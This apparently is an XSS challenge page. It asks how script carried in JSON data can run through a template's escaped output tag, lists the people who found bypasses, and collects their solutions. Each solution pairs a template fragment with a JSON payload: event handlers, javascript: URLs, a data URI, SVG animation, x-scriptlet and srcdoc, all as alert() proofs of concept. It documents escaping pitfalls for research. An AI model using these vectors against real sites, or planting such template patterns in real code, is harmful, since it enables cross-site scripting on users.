XSS Challenge

Challenge: Are you able to run script from a value in the JSON within the template when the template is trying to escape the data?

When you click the Render-button, the untrusted data in the JSON will be applied to the trusted template, and the output will be displayed on the left. Your goal is to have JS from a JSON value run even though <%= variable %> is used to output the value containing the attack.

Rules:

• You can change the template anyway you like. Available functions:
  • <% javascript %> - run javascript
  • <%= variable %> - output contents of variable escaped
  • <%- variable %> - output contents of variable unescaped
• Any named value in the JSON will be available in the template. You can change the JSON, add new key value pairs etc.
• This page does not take any parameters, so the challenge is to find a DOM Based XSS within javascript running in the page
• Running JS by adding it to the template does not qualify. Consider the template trusted code coming from you, and data in the JSON values untrusted

Email me or DM me on twitter if you find anything interesting.

Exploiters:

• @einaros
• @0x6D6172696F
• @0x6D6172696F
• @0x6D6172696F
• @soaj1664ashar - vector already found and published by @einaros though
• @cgvwzq
• Peksa
• @sneak_
• @Gunther_AR - vector already found and published by @einaros though
• @steike
• @0x6D6172696F
• @sneak_
• @cgvwzq
• @soaj1664ashar
• @soaj1664ashar (new version of previously published - this time using x-scriptlet)
• @Gunther_AR
• @Gunther_AR
• @soaj1664ashar
• @sneak_
• @iefuzzer
• @garethheyes (for countless advice)
• @secalert

Successful bypasses

<<%= foo %>>

{ "foo" : "img onerror='alert(1)' src=" }

<form id=x><button form=x formaction="<%= y %>">CLICKME

{"y":"javascript:alert(1)"}

<div style=mask:url(<%= title %>)></div>

<form action="<%= x %>"><<button>

{"x":"javascript:alert(1)"}

<img src=<%= a %> /><%= b %>

{"a":"'x","b":"'onerror=alert(1)//"}

<a
  href=<%=url%>
  title="Buy <%=number%> at <%=price%> = $<%=cost%>/month
	AND SAVE $$$">BUY NOW</a>

{"url":"","number":42,"price":"onmouseover","cost":"=alert(1)/"}

<svg>
<a xmlns:xlink="http://www.w3.org/1999/xlink" xlink:href="#">
<set attributeName="xlink:href" begin="0s" to="<%= x %>" /><circle r=40>
</a>
</svg>

{"x":"javascript:alert(1)"}

<object data="<%= boob %>"></object>

 {"boob":"data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="}

<input type="text" value=``<"<%=x%>"><%=x%></div>

{ "x":"div/onmouseover='alert(1)" }

<object type="text/x-scriptlet" data="<%=x%>"</object>

{ "x":"jsfiddle.net/XLE63/" }

<iframe/onreadystatechange=\u0061\u006C\u0065\u0072\u0074('<%=x%>')>

{"x":"\u0061"}

<meta http-equiv="refresh" content="0;url=<%= description %>">

{"description": "javascript:alert(document.domain)"}

<a link="<%= d %>" style="-o-link:attr(link);-o-link-source:current">click me</a>

{"description": "data:text/html,<script>alert(document.domain);</script>"}

<iframe srcdoc='&lt;svg/onload=<%=x%>&gt;'>

{"x":"alert(6)"}